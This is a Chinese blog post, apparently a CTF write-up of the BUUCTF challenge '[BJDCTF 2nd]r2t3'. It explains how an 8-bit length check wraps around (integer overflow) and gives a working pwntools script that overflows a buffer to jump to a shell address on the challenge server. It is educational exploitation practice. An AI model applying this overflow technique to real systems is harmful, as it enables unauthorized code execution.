整形溢出

最新推荐文章于 2021-10-13 17:13:58 发布
最新推荐文章于 2021-10-13 17:13:58 发布
阅读量478 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/110010626
版权

[BJDCTF 2nd]r2t3

来自buuctf

先看ida

在这里插入图片描述

buf缓冲区大小为408h,而read读取大小为400h,比buf要小,所以不能进行简单的缓冲区栈溢出。

再看name_check函数,v3是int8类型的变量,1111 1111 = 0xFF = 255。当0xFF +1的时侯,变量发生整形溢出,0x100 = 256 此时v3的数值为零(0000 0000),但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作变成 1 0000 0000。

同时还要满足3< v3 <8 的条件,这时候可以确定溢出数值是在 0x104~0x107 中

在这里插入图片描述

后面的strcpy()函数将s复制给dest,看到dest的偏移为0x11+4

程序中给出了/bin/sh的地址

exp:

from pwn import *
#context.log_level = 'debug'
r=remote('node3.buuoj.cn',26213)
sys_addr = 0x08048594
payload = 'a' * (0x15) + p32(sys_addr) + 'a' * (0x104-0x19) # 0x15 + 0x4 + n = 0x104 
print(len(payload))
r.recvuntil('name:\n')
r.sendline(payload)
r.interactive()

Int8, 等于Byte, 占1个字节.

Int16, 等于short, 占2个字节. -32768 32767

Int32, 等于int, 占4个字节. -2147483648 2147483647

Int64, 等于long, 占8个字节. -9223372036854775808 9223372036854775807

这样, 看起来比short,int,long更加直观些!

另外, 还有一个Byte, 它等于byte, 0 - 255.

所以说这里的v3是占一个字节的,一个字节是由8位二进制决定的。

例如:0000 0000 就是一个字节,代表0,1111 1111 也是一个字节,代表255.

参考1
参考2

_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn 整型溢出
清霂的博客
03-09 426
目录int_overflow 攻防世界r2t3 BUUoverflow int_overflow 攻防世界 file checksec ida32,进入login 输入一个用户名,再输入一个passwd,都无法直接栈溢出,进入check_passwd 发现v3是输入passwd的长度,v3是unsigned __int8类型范围是0~255 如果s的长度超过255,会变为(对s长度取模运算)得到的值。而s的长度不能大于0x199(409),取模后 v3>3&&v3<=
C语言的整型溢出问题
wuyangyang555的博客
10-03 3093
整型溢出有点老生常谈了,bla, bla, bla… 但似乎没有引起多少人的重视。整型溢出会有可能导致缓冲区溢出,缓冲区溢出会导致各种黑客攻击,比如最近OpenSSL的heartbleed事件,就是一个buffer overread的事件。在这里写下这篇文章,希望大家都了解一下整型溢出,编译器的行为,以及如何防范,以写出更安全的代码。
逆向- 1) 汇编 - 0x02 原码补码反码
qq726232111的博客
12-25 832
0x00 有符号数 - 负数 最高位为1,代表负数 除去最高位剩余位以无符号数解析,符号为负 -> 原码 计算机以补码保存有符号数 0x01 原码 最高位为符号位,其余位为数值 0 001 0011 -> 0x13 -> 19 1 001 0011 -> -0x13 -> -19 ...
位运算符——&0xFF的运算与讲解
Jafer的博客
08-01 1万+
区分 &,丨,^的运算规则 & (按位与运算符)表示: 两个操作数中位都为1,结果为1 如果两个操作中位一个1另一个0 ,结果为0 即运算规则:0&0=0; 0&1=0; 1&0=0; 1&1=1; 例如:1010 & 1110= 1010 |(按位或运算符)表示: 两个操作中位只有一个为1,结果就等与1 即运算规则:0|0=0; ...
C 语言中的数据类型(扩充)
止步听风的博客
04-14 737
该篇文章是对之前文章的一个补充。 首先,在计算机中 内存是线性的 内存是以字节为单位进行编址的,内存中的每个字节都对应一个地址 程序的执行过程中,数据都要保存到内存当中 而数据是有类型的,计算机会根据数据类型分配连续的一段内存作为数据的存储空间,也就是说利用数据类型,就沟通了内存大小和数据之间的关系。 数据类型与内存的关系 数据类型表示数据申请的内存单元大小和访问的规则,表示了数据在内...
-1的原码、反码、补码(0xff)
个人工作中学到的专业技术与职业发展知识笔记
01-24 1万+
-1的表示 1、0xff的无符号数为255,当作为有符号数显示则为-1。 2、-1的原码表示为1001;除符号位取反得反码:1110;加1得补码:1111即0xff。 3、负数在计算机中用补码表示。 参考资料: c++ 2、机器数、真值、原码、补码、反码 ...
整型的溢出详解
gao_zhennan的博客
10-13 8491
前言:本文介绍的整型的溢出并不针对某种编程语言,通过数在机器中存储的方式,说明为什么会存在溢出以及溢出后数的实际存储情况。 一、什么是溢出(理解即可) 当我们在计算机中要存储的数超出了该类型数可以表示的范围就会发生溢出。例如,Java中的byte类型数据范围为[-128,127],你想要存储的数为128,此时会发生上溢;要存储的数为-129,此时会发生下溢。其核心思想是超出可以表示的范围。就像向杯子中倒水,水超出了杯子的容量,就会溢出来。 二、为什么会发生溢出 前文已经有所介绍:超出了可以表示的范围。 .
检查整形溢出的计算器
06-23
一个检查Int类型运算时是否溢出的代码,再送一个生成从1到n的全排列的代码,够意思吧,还0积分就可下载!!!我叫Jacket
缓冲取溢出攻击原理案例
10-19
黑客就是通过改变地址来攻击他人的程序的。这乃中科院视频,有助于提高对C++的理解和认识。
整型数据的溢出
11-23
整型数据的溢出说明。介绍了C语言中关于整型数据溢出的相关知识,适合于初学者的理解应用。
整形数据的溢出文本文件
06-26
整形数据的溢出文本文件
整形数据的溢出.c源文件
06-26
整形数据的溢出.c源文件
详解 & 0xff 的意义及作用
热门推荐
过往很淡的博客
10-23 2万+
首先我们要都知道, &表示按位与,只有两个位同时为1,才能得到1, 0x代表16进制数,0xff表示的数二进制1111 1111 占一个字节.和其进行&操作的数,最低8位,不会发生变化. 下面着重来说说&0xff都有哪些应用: 1. 只是为了取得低八位 通常配合移位操作符>>使用 例如:java socket通信中基于长度的成帧方法中,如果发送的信息长度小于65535字节,长度信息的字节 定义为两个字节长度。这时候将两个字节长的长度信息,以Big-Endian的
二进制漏洞原理--整型溢出漏洞
qq_40410406的博客
11-13 1116
1
[BJDCTF 2nd]r2t3 (整型溢出
qq_45691294的博客
12-16 172
进入到题目环境,程序接收一个输入,测试之后,发现输入任何值的返回都是Oops,u name is too long! checksec查看一下程序保护,只开启了NX 那就用IDA分析一下程序,将输入读取到buf的内存当中,又作为name_check函数的参数 进入到name_check函数里,存在一个判断,如果参数的长度大于3且小于等于8,则将s的值复制到dest的内存空间里。 分析之后,当通过条件判断之后,变量dest可以造成栈溢出 这里也存在整数溢出,v3的类型为unsigned __int8是一
BJDCTF 2nd writeup
abtgu的博客
03-23 1350
[BJDCTF 2nd]签到-y1ng 题目: QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ== 解题思路: 直接base64解码即可。BJD{W3lc0me_T0_BJDCTF} [BJDCTF 2nd]灵能精通-y1ng 题目: 身经百战的Y1ng已经达到崇高的武术境界,以自律克己来取代狂热者的战斗狂怒与传统的战斗形式。Y1ng所受的训练也进一步将他们的灵能强化到足以瓦解周遭...
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3
mcmuyanga的博客
08-29 457
[BUUCTF]PWN12——[BJDCTF 2nd]r2t3 题目网址:https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3 步骤: 例行检查,32位,开启了NX保护 nc一下看看程序的大概执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了system函数和 ‘/bin/sh’ 字符串 双击跟进,ctrl+x找到调用改字符串的函数,找到了程序里的一个后门函数,shell_addr=0x804858B 根据nc得到的提示字符串,找到输
python安装pwn_CTF-Pwn-[BJDCTF 2nd] r2t3
weixin_42523792的博客
01-04 185
CTF-Pwn-[BJDCTF 2nd] r2t3博客说明文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!CTP平台网址https://buuoj.cn/challenges题目Pwn类,[BJDCTF 2nd] r2t3下载题目的文件R2t3思路使用file命令查看,发现是32位的文件,使用ida...
checksec
Trick的博客
11-10 2740
checksec checksec到底是用来干什么的? 它是用来检查可执行文件属性,例如PIE, RELRO, PaX, Canaries, ASLR, Fortify Source等等属性。 我们在ubuntu下使用它时,会显示有5行信息: 1.Arch 从这行信息可以知道程序是32bit还是64bit的 2.RELRO 3.Stack 显示Stack:No canary found则表示可以利用栈溢出 编译时控制是否开启栈保护以及程度: gcc -fno-stack-protector -o test
c语言代码短整形变量的溢出
最新发布
06-07
当一个 short 类型的变量超出了其数据类型的最大值时,就会发生短整型变量的溢出。这会导致变量的值从最大值变成最小值,这种现象被称为“循环溢出”或“环绕溢出”。 例如,对于一个有符号的 short 类型的变量,其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值